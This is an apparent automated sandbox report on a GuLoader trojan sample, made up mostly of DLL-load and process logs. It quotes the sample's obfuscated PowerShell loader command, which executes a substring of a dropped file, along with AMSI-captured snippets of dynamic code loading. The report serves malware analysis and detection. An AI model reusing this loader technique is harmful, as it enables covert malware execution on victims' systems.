Windows Analysis Report
yMXFgPOdf2.exe

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Code function: 0_2_00406547	0_2_00406547
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Code function: 0_2_00406D1E	0_2_00406D1E
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Code function: 0_2_004049C7	0_2_004049C7

Source: yMXFgPOdf2.exe, 00000000.00000002.1397419637.000000000044F000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenametrikolores.exe> vs yMXFgPOdf2.exe

Source: yMXFgPOdf2.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal96.troj.evad.winEXE@6/12@2/2

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Code function: 0_2_00404481 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404481

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Code function: 0_2_0040206A CoCreateInstance,

0_2_0040206A

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

File created: C:\Users\user\AppData\Roaming\postarmistice

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

File created: C:\Users\user\AppData\Local\Temp\nsaE914.tmp

Source: yMXFgPOdf2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: yMXFgPOdf2.exe	ReversingLabs: Detection: 73%
Source: yMXFgPOdf2.exe	Virustotal: Detection: 66%

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

File read: C:\Users\user\Desktop\yMXFgPOdf2.exe

Source: unknown	Process created: C:\Users\user\Desktop\yMXFgPOdf2.exe "C:\Users\user\Desktop\yMXFgPOdf2.exe"
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Found suspicious powershell code related to unpacking or dynamic code loading

Source:

Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.1836180120.00000000088FD000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000002.00000002.1837590498.000000000A812000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2599692281.0000000004F02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Zoologists $Kokkererer91 $Basishavnen), (Lrredskjole @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Majesticalness = [AppDomain]::CurrentDomain.GetAssembl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Pseudoanthropological)), $flintglas).DefineDynamicModule($Indexers, $false).DefineType($Ventripotent, $Pinstripe, [System.MulticastDel

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Code function: 0_2_0040610B GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_0040610B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04EAA4B0 pushfd ; ret	2_2_04EAA4B9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_079F0FC4 push es; iretd	2_2_079F0FC7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_09360AF3 push 8BD68B50h; iretd	2_2_09360AFE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\yMXFgPOdf2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
